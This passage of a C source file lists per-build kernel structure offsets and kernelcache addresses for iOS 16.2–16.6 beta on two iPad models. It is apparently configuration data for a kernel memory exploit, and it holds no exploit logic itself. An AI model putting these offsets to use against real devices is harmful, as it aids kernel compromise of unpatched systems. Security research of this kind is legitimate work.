.kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2f7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a50c, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D47", .device_id = "iPad13,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D67", .device_id = "iPad13,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.4 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E246", .device_id = "iPad13,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.4.1 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:40:42 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8103", .build_version = "20E252", .device_id = "iPad13,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aacd208, .kernelcache__gPhysBase = 0xfffffe0007a7ffc0, .kernelcache__gPhysSize = 0xfffffe0007a7ffc0 + 8, .kernelcache__gVirtBase = 0xfffffe0007a7e198, .kernelcache__perfmon_devices = 0xfffffe000ab0b520, .kernelcache__perfmon_dev_open = 0xfffffe00080d03c0, .kernelcache__ptov_table = 0xfffffe00079cb188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab0a990, .kernelcache__vm_pages = 0xfffffe00079c7eb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ca128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab0a988, .kernelcache__vn_kqfilter = 0xfffffe000811f2b4, }, // iOS 16.5 { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:10:54 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8103", .build_version = "20F66", .device_id = "iPad13,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aad5288, .kernelcache__gPhysBase = 0xfffffe0007a84100, .kernelcache__gPhysSize = 0xfffffe0007a84100 + 8, .kernelcache__gVirtBase = 0xfffffe0007a822d8, .kernelcache__perfmon_devices = 0xfffffe000ab13520, .kernelcache__perfmon_dev_open = 0xfffffe00080d45c0, .kernelcache__ptov_table = 0xfffffe00079cf188, .kernelcache__vm_first_phys_ppnum = 0xfffffe000ab12990, .kernelcache__vm_pages = 0xfffffe00079cbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079ce128, .kernelcache__vm_page_array_ending_addr = 0xfffffe000ab12988, .kernelcache__vn_kqfilter = 0xfffffe000812374c, }, // iOS 16.6b1 { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:17:58 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8103", .build_version = "20G5026e", .device_id = "iPad13,10", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000ab85ab0, .kernelcache__gPhysBase = 0xfffffe0007a982a8, .kernelcache__gPhysSize = 0xfffffe0007a982a8 + 8, .kernelcache__gVirtBase = 0xfffffe0007a96460, .kernelcache__perfmon_devices = 0xfffffe000abc5550, .kernelcache__perfmon_dev_open = 0xfffffe00080f8dfc, .kernelcache__ptov_table = 0xfffffe00079e39c8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000abc4910, .kernelcache__vm_pages = 0xfffffe00079e0108, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00079e2968, .kernelcache__vm_page_array_ending_addr = 0xfffffe000abc4908, .kernelcache__vn_kqfilter = 0xfffffe0008147958, }, // iPad Pro 11 inch 5th // // iOS 16.2 { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:09:33 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8103", .build_version = "20C65", .device_id = "iPad13,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000a9f5190, .kernelcache__gPhysBase = 0xfffffe00079a00c8, .kernelcache__gPhysSize = 0xfffffe00079a00c8 + 8, .kernelcache__gVirtBase = 0xfffffe000799e2a8, .kernelcache__perfmon_devices = 0xfffffe000aa303b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7f50, .kernelcache__ptov_table = 0xfffffe00078eb378, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa2f800, .kernelcache__vm_pages = 0xfffffe00078e8090, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea328, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa2f7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a50c, }, // iOS 16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D47", .device_id = "iPad13,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffe0007004000, .kernelcache__cdevsw = 0xfffffe000aa01190, .kernelcache__gPhysBase = 0xfffffe00079a01b0, .kernelcache__gPhysSize = 0xfffffe00079a01b0 + 8, .kernelcache__gVirtBase = 0xfffffe000799e390, .kernelcache__perfmon_devices = 0xfffffe000aa3c3b0, .kernelcache__perfmon_dev_open = 0xfffffe00080b7cc4, .kernelcache__ptov_table = 0xfffffe00078eb3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffe000aa3b800, .kernelcache__vm_pages = 0xfffffe00078e80d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffe00078ea368, .kernelcache__vm_page_array_ending_addr = 0xfffffe000aa3b7f8, .kernelcache__vn_kqfilter = 0xfffffe000810a280, }, // iOS 16.3.1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:25:19 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8103", .build_version = "20D67", .device_id = "iPad13,11", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, 